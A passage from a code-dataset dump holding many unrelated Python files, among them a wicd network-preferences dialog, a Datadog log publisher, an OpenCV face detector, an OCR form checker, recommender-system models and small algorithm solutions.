self.verify_ap_checkb, _blank\n ])\n\n headerList = [self.header0, self.header1, self.header2]\n lbList = [generalLB, externalLB, advancedLB]\n self.tab_map = {\n self.header0: generalLB,\n self.header1: externalLB,\n self.header2: advancedLB\n }\n #self.load_settings()\n\n self.tabs = TabColumns(headerList, lbList, _('Preferences'))\n # pylint: disable-msg=E1101\n self.__super.__init__(self.tabs)\n\n def load_settings(self):\n \"\"\" Load settings to be used in the dialog. \"\"\"\n ### General Settings\n # ComboBox does not like dbus.Strings as text markups. My fault. :/\n wless_iface = unicode(daemon.GetWirelessInterface())\n wired_iface = unicode(daemon.GetWiredInterface())\n self.wless_edit.set_edit_text(wless_iface)\n self.wired_edit.set_edit_text(wired_iface)\n\n self.always_show_wired_checkb.set_state(\n daemon.GetAlwaysShowWiredInterface())\n self.prefer_wired_chkbx.set_state(daemon.GetPreferWiredNetwork())\n # DNS\n self.global_dns_checkb.set_state(daemon.GetUseGlobalDNS())\n theDNS = daemon.GetGlobalDNSAddresses()\n\n i = 0\n for w in self.dns1, self.dns2, self.dns3, self.dns_dom, self.search_dom:\n w.set_edit_text(misc.noneToBlankString(theDNS[i]))\n i += 1\n\n # Wired Automatic Connection\n self.wired_auto_l[daemon.GetWiredAutoConnectMethod() - 1]\n self.auto_reconn_checkb.set_state(daemon.GetAutoReconnect())\n\n def find_avail(apps):\n \"\"\" Find available apps. \"\"\"\n for app in apps[1:]:\n app.set_sensitive(daemon.GetAppAvailable(app.get_label()))\n\n ### External Programs\n find_avail(self.dhcp_l)\n dhcp_method = daemon.GetDHCPClient()\n self.dhcp_l[dhcp_method].set_state(True)\n\n find_avail(self.wired_l)\n wired_link_method = daemon.GetLinkDetectionTool()\n self.wired_l[wired_link_method].set_state(True)\n\n find_avail(self.flush_l)\n flush_method = daemon.GetFlushTool()\n self.flush_l[flush_method].set_state(True)\n\n ### Advanced settings\n # wpa_supplicant janx\n self.wpadrivers = wireless.GetWpaSupplicantDrivers()\n self.wpadrivers.append(\"ralink_legacy\")\n self.wpadrivers.append('none')\n # Same as above with the dbus.String\n self.thedrivers = [unicode(w) for w in self.wpadrivers]\n self.wpa_cbox.set_list(self.thedrivers)\n\n # Pick where to begin first:\n def_driver = daemon.GetWPADriver()\n try:\n self.wpa_cbox.set_focus(self.wpadrivers.index(def_driver))\n except ValueError:\n pass # It defaults to 0 anyway (I hope)\n\n self.backends = daemon.GetBackendList()\n self.thebackends = [unicode(w) for w in self.backends]\n self.backend_cbox.set_list(self.thebackends)\n cur_backend = daemon.GetSavedBackend()\n try:\n self.backend_cbox.set_focus(self.thebackends.index(cur_backend))\n except ValueError:\n self.backend_cbox.set_focus(0)\n\n # Three last checkboxes\n self.debug_mode_checkb.set_state(daemon.GetDebugMode())\n self.use_dbm_checkb.set_state(daemon.GetSignalDisplayType())\n self.verify_ap_checkb.set_state(daemon.GetShouldVerifyAp())\n\n def save_settings(self):\n \"\"\" Pushes the selected settings to the daemon.\n This exact order is found in prefs.py\"\"\"\n daemon.SetUseGlobalDNS(self.global_dns_checkb.get_state())\n\n for i in [\n self.dns1, self.dns2, self.dns3,\n self.dns_dom, self.search_dom, self.dns_dom\n ]:\n i.set_edit_text(i.get_edit_text().strip())\n\n daemon.SetGlobalDNS(\n self.dns1.get_edit_text(),\n self.dns2.get_edit_text(),\n self.dns3.get_edit_text(),\n self.dns_dom.get_edit_text(),\n self.search_dom.get_edit_text()\n )\n daemon.SetWirelessInterface(self.wless_edit.get_edit_text())\n daemon.SetWiredInterface(self.wired_edit.get_edit_text())\n daemon.SetWPADriver(self.wpadrivers[self.wpa_cbox.get_focus()[1]])\n daemon.SetAlwaysShowWiredInterface(\n self.always_show_wired_checkb.get_state()\n )\n daemon.SetAutoReconnect(self.auto_reconn_checkb.get_state())\n daemon.SetDebugMode(self.debug_mode_checkb.get_state())\n daemon.SetSignalDisplayType(int(self.use_dbm_checkb.get_state()))\n daemon.SetShouldVerifyAp(int(self.verify_ap_checkb.get_state()))\n daemon.SetPreferWiredNetwork(bool(self.prefer_wired_chkbx.get_state()))\n if self.wired_auto_2.get_state():\n daemon.SetWiredAutoConnectMethod(2)\n elif self.wired_auto_3.get_state():\n daemon.SetWiredAutoConnectMethod(3)\n else:\n daemon.SetWiredAutoConnectMethod(1)\n\n daemon.SetBackend(self.backends[self.backend_cbox.get_focus()[1]])\n\n # External Programs Tab\n if self.dhcp0.get_state():\n dhcp_client = misc.AUTO\n elif self.dhcp1.get_state():\n dhcp_client = misc.DHCLIENT\n elif self.dhcp2.get_state():\n dhcp_client = misc.DHCPCD\n elif self.dhcp3.get_state():\n dhcp_client = misc.PUMP\n else:\n dhcp_client = misc.UDHCPC\n daemon.SetDHCPClient(dhcp_client)\n\n if self.wired0.get_state():\n link_tool = misc.AUTO\n elif self.wired1.get_state():\n link_tool = misc.ETHTOOL\n else:\n link_tool = misc.MIITOOL\n daemon.SetLinkDetectionTool(link_tool)\n\n if self.flush0.get_state():\n flush_tool = misc.AUTO\n elif self.flush1.get_state():\n flush_tool = misc.IP\n else:\n flush_tool = misc.ROUTE\n daemon.SetFlushTool(flush_tool)\n\n def global_dns_trigger(self, check_box, new_state, user_data=None):\n \"\"\" DNS CheckBox callback. \"\"\"\n for w in self.dns1, self.dns2, self.dns3, self.dns_dom, self.search_dom:\n w.set_sensitive(new_state)\n\n def ready_widgets(self, ui, body):\n \"\"\" Build comboboxes. \"\"\"\n self.wpa_cbox.build_combobox(body, ui, 4)\n self.backend_cbox.build_combobox(body, ui, 8)\n","repo_name":"dpaleino/wicd","sub_path":"curses/prefs_curses.py","file_name":"prefs_curses.py","file_ext":"py","file_size_in_byte":14937,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"53"} +{"seq_id":"16434828075","text":"import string\nfrom typing import Union\n\nfrom datadog_api_client import ApiClient, Configuration\nfrom datadog_api_client.v2.api.logs_api import LogsApi\nfrom datadog_api_client.v2.model.content_encoding import ContentEncoding\nfrom datadog_api_client.v2.model.http_log import HTTPLog\nfrom datadog_api_client.v2.model.http_log_item import HTTPLogItem\n\n\nclass LogPublisher:\n def __init__(self,\n application_name: str,\n svc_name: str,\n svc_type: str,\n team: str,\n api_key: dict):\n self.api_key = api_key\n self.application_name = application_name\n self.svc_name = svc_name\n self.svc_type = svc_type\n self.team = team\n self.configuration = Configuration(api_key=api_key)\n self.api_client = ApiClient(self.configuration)\n self.api_instance = LogsApi(self.api_client)\n\n def construct_final_tags(self, extra_tags: set = None) -> Union[str]:\n tags = {\n 'application:{}'.format(self.application_name),\n 'service_type: {}'.format(self.svc_type),\n 'service: {}'.format(self.svc_name),\n 'team: {}'.format(self.team)\n }\n\n if extra_tags is None:\n extra_tags = {}\n\n final_tags = tags.union(extra_tags)\n return ', '.join(final_tags)\n\n def construct_payload(self, log_msg: str, log_level: str, extra_tags: set = None) -> HTTPLog:\n body = HTTPLog(\n [\n HTTPLogItem(\n message=log_msg,\n service=self.svc_name,\n status=log_level,\n ddtags=self.construct_final_tags(extra_tags)\n )\n ]\n )\n return body\n\n def publish_log_to_datadog(self, log_msg: string, log_level: str = \"INFO\", extra_tags: set = None):\n body = self.construct_payload(log_msg, log_level, extra_tags)\n response = self.api_instance.submit_log(content_encoding=ContentEncoding.GZIP, body=body)\n\n\n","repo_name":"pranavdua/oi_reports_ODS_1596","sub_path":"oi_reports/remote_logging/datadog_ops.py","file_name":"datadog_ops.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2038235906","text":"import os \nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')\nimport random\n\n\nimport django \ndjango.setup() \n\nfrom faker import Faker \nfrom reviews.models import * \nfrom model_bakery.recipe import Recipe,foreign_key \n\n\nimport datetime\nstart_date = datetime.date(year=2021, month=1, day=1)\nend_date = datetime.date(year=2023, month=12, day=31)\n\nfake = Faker() \n\nfor k in range(4000):\n fake_date = fake.date_between(start_date=start_date, end_date=end_date)\n \n if Review.objects.filter(submitted_at=fake_date).exists():\n review = Review.objects.get(submitted_at=fake_date)\n question = Question.objects.get(id=random.randint(1,4))\n answer = Recipe(Answer, \n review=review,\n question=question,\n choice=random.choice(question.choices.all())) \n answer.make()\n print(\"1\", review)\n else:\n review=Recipe(Review, submitted_at=fake_date)\n question = Question.objects.get(id=random.randint(1,4))\n answer = Recipe(Answer, \n review=foreign_key(review),\n question=question,\n choice=random.choice(question.choices.all())) \n answer.make()\n print(\"2\", review)\n","repo_name":"fekrii/Django-Reviews","sub_path":"createReviewsData.py","file_name":"createReviewsData.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18076535013","text":"NumChannels = 140\nNumChannelsExt = 165 # see https://github.com/evilsocket/pwnagotchi/issues/583\n\n\ndef freq_to_channel(freq):\n if freq <= 2472:\n return int(((freq - 2412) / 5) + 1)\n elif freq == 2484:\n return int(14)\n elif 5035 <= freq <= 5865:\n return int(((freq - 5035) / 5) + 7)\n else:\n return 0\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/mesh/wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"33801007974","text":"import json\nimport re\nimport sys\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, Dict, Union\n\nimport cv2\nimport pytesseract as tes\nfrom PIL import Image\n\nfrom onti import finder\n\n\ndef prepare(s: str):\n \"\"\"\n produces lowercase russian-only symbols\n :param s: given string\n :return: prepared string\n \"\"\"\n return re.sub(r'[^а-я0-9]', '', s.lower())\n\n\nclass Requirement(ABC):\n \"\"\"\n This abstract class corresponds to requirement. Any acceptable agreement should pass it's test.\n \"\"\"\n\n @abstractmethod\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n \"\"\"\n scores text in some way\n :param image: whole image\n :param text: given text\n :param data: text data\n :return: remaining text and score\n \"\"\"\n pass\n\n @abstractmethod\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n \"\"\"\n determines whether text contains requirement or not\n :param image: whole image\n :param text: given text\n :param data: text data\n :return: True if text is acceptable, False otherwise\n \"\"\"\n pass\n\n\nclass RequiredText(Requirement):\n \"\"\"\n This class corresponds to text data which should be represented in agreement.\n \"\"\"\n\n def __init__(self, record: Dict[str, Union[int, str]]):\n \"\"\"\n required text\n :param record: json record\n \"\"\"\n self.pattern: str = record[\"str\"]\n self.threshold: int = record.get(\"threshold\", 0)\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n match = re.search(self.pattern, text)\n if match:\n return text[match.regs[0][1]:], 0\n return '', 100\n\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n remaining, score = self.score(text, data, image)\n return remaining, score <= self.threshold\n\n def __repr__(self):\n return f'text: {self.pattern}'\n\n\nclass RequiredForm(Requirement):\n \"\"\"\n This class corresponds to some form in agreement which must be filled.\n \"\"\"\n\n def __init__(self, record: Dict[str, Union[int, str]]):\n \"\"\"\n required form\n :param record: json record\n \"\"\"\n self.left_anchor: str = record['left']\n self.right_anchor: str = record['right']\n self.threshold: int = record['threshold']\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n left_index, right_index = None, None\n for i, anchor_name in enumerate(data['text']):\n if re.search(self.left_anchor, anchor_name, re.IGNORECASE):\n left_index = i\n break\n if not left_index:\n return text, 0\n for i, anchor_name in enumerate(data['text'][left_index + 1:]):\n if re.search(self.right_anchor, anchor_name, re.IGNORECASE):\n right_index = left_index + 1 + i\n break\n if not right_index:\n return text, 0\n field = image.crop((data['left'][left_index] + data['width'][left_index], data['top'][left_index],\n data['left'][right_index], data['top'][right_index] + data['height'][right_index]))\n # print(field.entropy())\n return text, field.entropy()\n\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n remaining, score = self.score(text, data, image)\n return remaining, score * 100 >= self.threshold\n\n def __repr__(self):\n return f'form: \"{self.left_anchor}\" to \"{self.right_anchor}\"'\n\n\nclass RequiredOption(Requirement):\n def __init__(self, record):\n self.requirements = [process_requirement(requirement) for requirement in record[\"requirements\"]]\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n result = 0\n for requirement in self.requirements:\n text, requirement_score = requirement.score(text, data, image)\n result += requirement_score\n return text, result\n\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n for requirement in self.requirements:\n text, requirement_passed = requirement.compare(text, data, image)\n # print(f'block({requirement}) passed: {requirement_passed}')\n if requirement_passed:\n return text, True\n return text, False\n\n def __repr__(self):\n return f\"option: {' or '.join([f'({requirement})' for requirement in self.requirements])}\"\n\n\nclass RequiredBlock(Requirement):\n \"\"\"\n This class corresponds to a list of requirements applied to agreement.\n \"\"\"\n\n def __init__(self, record):\n self.requirements = [process_requirement(requirement) for requirement in record[\"requirements\"]]\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n result = 0\n for requirement in self.requirements:\n text, requirement_score = requirement.score(text, data, image)\n result += requirement_score\n return text, result\n\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n for requirement in self.requirements:\n text, requirement_passed = requirement.compare(text, data, image)\n # print(f'block({requirement}) passed: {requirement_passed}')\n if not requirement_passed:\n return text, False\n return text, True\n\n\ndef process_requirement(record) -> Requirement:\n return {\n \"text\": RequiredText,\n \"form\": RequiredForm,\n \"block\": RequiredBlock,\n \"option\": RequiredOption\n }[record[\"type\"]](record)\n\n\ndef load_requirements(file_name: str) -> Dict[str, Requirement]:\n with open(file_name, 'r') as file:\n forms_dict = json.load(file)\n result = dict()\n for form_name, form_data in forms_dict.items():\n result[form_name] = process_requirement(form_data)\n return result\n\n\ndef process_image(file_name: str, form: Requirement) -> Tuple[str, bool]:\n image = cv2.imread(file_name)\n # image = cv2.resize(image, (1650, 2340))\n # image = cv2.medianBlur(image, 3)\n # image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n image = finder.get_leveled_document(image)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n temporary_file_name = '.temp.png'\n cv2.imwrite(temporary_file_name, image)\n ocr_image = Image.open(temporary_file_name)\n # os.remove(temporary_file_name)\n data = tes.image_to_data(ocr_image, lang='rus', output_type=tes.Output.DICT)\n text = prepare(''.join(data['text']))\n return form.compare(text, data, ocr_image)\n\n\ndef test():\n requirements = load_requirements('./onti/forms.json')\n print(process_image('test2.png', requirements[\"form1\"]))\n\n\ndef main():\n file_name = sys.argv[1]\n requirements = load_requirements('./onti/forms.json')\n remaining_text, is_agreement = process_image(file_name, requirements[\"form1\"])\n print('ok' if is_agreement else '')\n\n\nif __name__ == '__main__':\n sys.argv.append(\"test3.jpg\")\n main()\n","repo_name":"ekinohito/kruzhok.pro-first2","sub_path":"onti/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70205489768","text":"from starlette.applications import Starlette\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.middleware.cors import CORSMiddleware\nimport uvicorn, aiohttp, asyncio\nfrom io import BytesIO\n\nfrom fastai import *\nfrom fastai.vision import *\n\nmodel_file_url = 'https://drive.google.com/uc?export=download&id=1u-JTF4yRqYdEg9PegCWCggQaX_pwop50'\nmodel_file_name = 'model2'\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\nasync def download_file(url, dest):\n if dest.exists(): return\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n data = await response.read()\n with open(dest, 'wb') as f: f.write(data)\n\n\nasync def setup_learner():\n await download_file(model_file_url, path/'models'/f'{model_file_name}.pth')\n data_bunch = (ImageItemList.from_folder(path)\n .random_split_by_pct()\n .label_const(0, label_cls=FloatList)\n .transform(get_transforms(), size=224)\n .databunch()).normalize(imagenet_stats)\n learn = create_cnn(data_bunch, models.resnet50, pretrained=False)\n learn.load(model_file_name)\n return learn\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n@app.route('/')\ndef index(request):\n html = path/'view'/'index.html'\n return HTMLResponse(html.open().read())\n\n@app.route('/analyze', methods=['POST'])\nasync def analyze(request):\n data = await request.form()\n img_bytes = await (data['file'].read())\n img = open_image(BytesIO(img_bytes))\n return JSONResponse({'result': int(round(float(learn.predict(img)[0][0]),0))})\n\nif __name__ == '__main__':\n if 'serve' in sys.argv: uvicorn.run(app, host='0.0.0.0', port=5042)\n\n","repo_name":"btahir/age-detector","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"21316389797","text":"# 丑数 就是只包含质因数 2、3 和 5 的正整数。\r\n# 给你一个整数 n ,请你判断 n 是否为 丑数 。如果是,返回 true ;否则,返回 false\r\nclass Solution:\r\n def isUgly(self, n: int) -> bool:\r\n if n <= 0:\r\n return False\r\n while n % 2 == 0:\r\n n //= 2\r\n while n % 3 == 0:\r\n n //= 3\r\n while n % 5 ==0:\r\n n //= 5\r\n return n == 1","repo_name":"Ww0225/pythonTest","sub_path":"丑数.py","file_name":"丑数.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737346227","text":"def solution(board, skill):\n answer = 0\n m = len(board[0])\n n = 0\n for _ in board:\n n += 1\n sum = [[0] * (m+1) for _ in range(n+1)]\n\n for s in skill:\n if s[0] == 1:\n sum[s[1]][s[2]] -= s[5]\n sum[s[1]][s[4]+1] += s[5]\n sum[s[3]+1][s[2]] += s[5]\n sum[s[3]+1][s[4]+1] -= s[5]\n else:\n sum[s[1]][s[2]] += s[5]\n sum[s[1]][s[4]+1] -= s[5]\n sum[s[3]+1][s[2]] -= s[5]\n sum[s[3]+1][s[4]+1] += s[5]\n \n # 누적합 구하기\n # 왼쪽에서 오른쪽\n for row in sum:\n for i in range(1, len(row)):\n row[i] += row[i-1] \n # 위에서 아래\n for j in range(len(sum)):\n for i in range(1, len(sum)):\n sum[i][j] += sum[i-1][j]\n\n for i in range(n):\n for j in range(m):\n board[i][j] += sum[i][j]\n if board[i][j] > 0:\n answer += 1\n \n return answer\n ","repo_name":"miseongk/Algorithm","sub_path":"Programmers/Level/Level3/92344.py","file_name":"92344.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21103635010","text":"import abc\nfrom typing import Any\n\nimport numpy as np\nimport numpy.typing as npt\nimport torch\n\n\nclass AbstractResponseModel(metaclass=abc.ABCMeta):\n def __init__(self, null_response: float = -1.0) -> None:\n self.null_response = null_response\n\n @abc.abstractmethod\n def generate_response(\n self,\n estimated_user_state: torch.Tensor,\n doc_repr: torch.Tensor,\n ) -> float:\n \"\"\"\n Generate the user response (reward) to a slate,\n is a function of the user state and the chosen document in the slate.\n\n Args:\n estimated_user_state (np.array): estimated user state\n doc_repr (np.array): document representation\n\n Returns:\n float: user response\n \"\"\"\n pass\n\n def generate_null_response(self) -> torch.Tensor:\n return torch.tensor(self.null_response)\n\n\nclass AmplifiedResponseModel(AbstractResponseModel):\n def __init__(self, amp_factor: int = 10, **kwds: Any) -> None:\n super().__init__(**kwds)\n self.amp_factor = amp_factor\n\n @abc.abstractmethod\n def _generate_response(\n self,\n estimated_user_state: npt.NDArray[np.float64],\n doc_repr: npt.NDArray[np.float64],\n ) -> float:\n \"\"\"\n Generate the user response (reward) to a slate,\n is a function of the user state and the chosen document in the slate.\n\n Args:\n estimated_user_state (np.array): estimated user state\n doc_repr (np.array): document representation\n\n Returns:\n float: user response\n \"\"\"\n pass\n\n def generate_response(\n self,\n estimated_user_state: torch.Tensor,\n doc_repr: torch.Tensor,\n ) -> float:\n return self._generate_response(estimated_user_state, doc_repr) * self.amp_factor\n\n def generate_null_response(self) -> float:\n return super().generate_null_response() * self.amp_factor\n\n\nclass CosineResponseModel(AmplifiedResponseModel):\n def _generate_response(\n self,\n estimated_user_state: torch.Tensor,\n doc_repr: torch.Tensor,\n ) -> float:\n satisfaction = torch.nn.functional.cosine_similarity(\n estimated_user_state, doc_repr, dim=0\n )\n return satisfaction\n\n\nclass DotProductResponseModel(AmplifiedResponseModel):\n def _generate_response(\n self,\n estimated_user_state: torch.Tensor,\n doc_repr: torch.Tensor,\n ) -> float:\n satisfaction = torch.dot(estimated_user_state, doc_repr)\n return satisfaction\n","repo_name":"Asr419/rl_recsys","sub_path":"src/rl_recsys/user_modeling/response_model.py","file_name":"response_model.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24724982950","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nroute = '/home/vedantmathur/Downloads/ns-allinone-3.36.1/ns-3.36.1'\n# /home/vedantmathur/Downloads/ns-allinone-3.36.1/ns-3.36.1/CDoS-1Mbps-adhoc-UDP-01/u_0=0.02rho=0.13/nodes_079_000\n\nrho_0 = np.arange(0.02, 1.0, 0.02)\nutilization = np.zeros((49, 41))\nthroughput = np.zeros((49, 41))\n\nfor i in range(len(rho_0)):\n for j in range(1,41):\n node_id = 82 - j*2\n data = np.loadtxt(route + '/CDoS-1Mbps-adhoc-UDP-01/u_0={:.2f}rho=0.13/nodes_{:03d}_000'.format(rho_0[i], node_id),usecols=range(10))\n utilization[i, j] = np.mean(data[150:, 8])\n data = np.loadtxt(route + '/CDoS-1Mbps-adhoc-UDP-01/u_0={:.2f}rho=0.13/nodes_{:03d}_000'.format(rho_0[i], node_id+1),usecols=range(10))\n throughput[i, j] = np.mean(data[150:, 1])\n\nplt.figure(1)\nplt.plot(rho_0, utilization[:, 19], linestyle='-', color='g', linewidth=6)\nplt.plot(rho_0, utilization[:, 39], linestyle=':', color='b', linewidth=6)\nplt.grid(True)\nplt.xlabel('Load at node $A_0$', fontsize=20)\nplt.ylabel('Utilization at node $A_i$', fontsize=20)\nplt.legend(['node $A_{20}$', 'node $A_{40}$'], fontsize=20)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.show()\n\nplt.figure(2)\nplt.plot(range(41), utilization[9, :], linestyle='-', color='r', linewidth=4)\nplt.plot(range(41), utilization[19, :], linestyle='--', color='b', linewidth=4)\nplt.plot(range(41), utilization[29, :], linestyle='-.', color='g', linewidth=4)\nplt.plot(range(41), utilization[39, :], linestyle=':', color='m', linewidth=4)\nplt.grid(True)\nplt.xlabel('Node index $i$', fontsize=20)\nplt.ylabel('Utilization at node $A_i$', fontsize=20)\nplt.xlim([0, 40])\nplt.ylim([0, 0.9])\nplt.legend(['$\\rho_0 = 0.2$', '$\\rho_0 = 0.4$', '$\\rho_0 = 0.6$', '$\\rho_0 = 0.8$'], fontsize=20)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.show()\n","repo_name":"Vedant0616/ns-allinone-3.36.1","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34839009078","text":"import pytorch_lightning as pl\r\nfrom torch.utils.data import DataLoader\r\nimport importlib\r\n\r\n\r\nclass DInterface(pl.LightningDataModule):\r\n def __init__(self, args, split):\r\n super().__init__()\r\n self.args = args\r\n self.split = split\r\n self.module_ = importlib.import_module(\"datasets.\" + self.args.set_name_test)\r\n\r\n def setup(self, stage=None):\r\n\r\n # Assign train/val datasets for use in dataloaders\r\n if stage == \"fit\" or stage is None:\r\n self.trainset = self.module_.set(\r\n self.args, self.split[\"train_keys\"], training=True\r\n )\r\n self.valset = self.module_.set(\r\n self.args, self.split[\"test_keys\"], training=False\r\n )\r\n\r\n if stage == \"test\" or stage is None:\r\n self.testset = self.module_.set(\r\n self.args,\r\n self.split[\"test_keys\"] + self.split[\"train_keys\"],\r\n training=False,\r\n )\r\n\r\n def train_dataloader(self):\r\n return DataLoader(\r\n self.trainset,\r\n batch_size=self.args.batch_size_train,\r\n num_workers=self.args.num_workers,\r\n )\r\n\r\n def val_dataloader(self):\r\n return DataLoader(\r\n self.valset, batch_size=self.args.batch_size_val, num_workers=0\r\n )\r\n\r\n def test_dataloader(self):\r\n return DataLoader(\r\n self.testset, batch_size=self.args.batch_size_val, num_workers=0\r\n )\r\n","repo_name":"HopLee6/SSPVS-PyTorch","sub_path":"datasets/DS_interface.py","file_name":"DS_interface.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"22185628332","text":"# python David_1_1_detect_face.py -i \"../../../CV_PyImageSearch/Dataset/data/basketball.jpg\"\n\n# Summary : \n # 1.Detect image\n # 2.save(imwrite) bondingbox_image to File\n \n# API : 1.cv2.waitKey(0) # Visualize the image until 設定手動關閉Visualize Image \n\n\n# 1. import the necessary packages\nimport cv2\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\", required = True, help = \"The Path to image\")\nargs = vars(ap.parse_args())\nimage = cv2.imread(args[\"image\"])\n\n # Resize\nimage = cv2.resize(image, (500, 400), interpolation=cv2.INTER_CUBIC)\n ## visualize\ncv2.imshow(\"Faces\", image)\ncv2.waitKey(0)\n\n\n# 2. load our image and convert it to grayscale\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n ## visualize\ncv2.imshow(\"Faces\", gray)\ncv2.waitKey(0)\n\n\n\n# 3. Draw the Bondingbox\n\n # 3.1 load the face detector \ndetector = cv2.CascadeClassifier(\"../../../detector/haarcascade.xml\")\n\nprint(detector) \n # 3.2 detect faces in the image\nrects = detector.detectMultiScale(gray, scaleFactor = 1.3, minNeighbors = 9,\n\tminSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n # loop over the faces and draw a rectangle surrounding each\nfor (x, y, w, h) in rects:\n\tcv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n #做一個有bonding box的灰階圖\nfor (x, y, w, h) in rects:\n\tcv2.rectangle(gray, (x, y), (x + w, y + h), (0, 255, 0), 3)\n \n # visualize\ncv2.imshow(\"Faces\", image)\ncv2.waitKey(0)\ncv2.imshow(\"Faces\", gray)\ncv2.waitKey(0) # Visualize the image until手動把它關閉\n # imwrite : Save the converted image\ncv2.imwrite(\"../../data/imwrite/chp1_1/basketball_box.jpg\", image) \ncv2.imwrite(\"../../data/imwrite/chp1_1/basketball_gray_box.jpg\", gray)\n","repo_name":"wcsodw1/Computer-Vision","sub_path":"CV_Pyimage/Module 1 CV Basic Technical/chp_1_0_Detect_face.py/David_1_1_detect_face.py","file_name":"David_1_1_detect_face.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32032647816","text":"\"\"\"TRAPI 1.0.0 to 0.9.2.\"\"\"\nfrom .util import ensure_list, snake_case\n\ndef downgrade_BiolinkEntity(biolink_entity):\n \"\"\"Downgrade BiolinkEntity from 1.0.0 to 0.9.2.\"\"\"\n return snake_case(biolink_entity[8:])\n\n\ndef downgrade_BiolinkPredicate(biolink_predicate):\n \"\"\"Downgrade BiolinkPredicate (1.0.0) to BiolinkRelation (0.9.2).\"\"\"\n return biolink_predicate[8:]\n\n\ndef downgrade_Node(node, id_):\n \"\"\"Downgrade Node from 1.0.0 to 0.9.2.\"\"\"\n new = {\"id\": id_}\n if node.get(\"category\", None) is not None:\n new[\"type\"] = [\n downgrade_BiolinkEntity(node_type)\n for node_type in ensure_list(node[\"category\"])\n ]\n if node.get(\"name\", None) is not None:\n new[\"name\"] = node[\"name\"]\n if node.get(\"attributes\", None) is not None:\n new = {\n **new,\n **{\n attribute.get(\"name\", f\"attribute{idx:02d}\"): attribute[\"value\"]\n for idx, attribute in enumerate(node[\"attributes\"])\n }\n }\n return new\n\n\ndef downgrade_Edge(edge, id_):\n \"\"\"Downgrade Edge from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"id\": id_,\n \"source_id\": edge[\"subject\"],\n \"target_id\": edge[\"object\"],\n }\n if edge.get(\"predicate\", None) is not None:\n new[\"type\"] = downgrade_BiolinkPredicate(edge[\"predicate\"])\n if edge.get(\"relation\", None) is not None:\n new[\"relation\"] = edge[\"relation\"]\n if edge.get(\"attributes\", None) is not None:\n new = {\n **new,\n **{\n attribute.get(\"name\", f\"attribute{idx:02d}\"): attribute[\"value\"]\n for idx, attribute in enumerate(edge.get(\"attributes\", []))\n }\n }\n return new\n\n\ndef downgrade_KnowledgeGraph(kgraph):\n \"\"\"Downgrade KnowledgeGraph from 1.0.0 to 0.9.2.\"\"\"\n return {\n \"nodes\": [\n downgrade_Node(knode, id_)\n for id_, knode in kgraph[\"nodes\"].items()\n ],\n \"edges\": 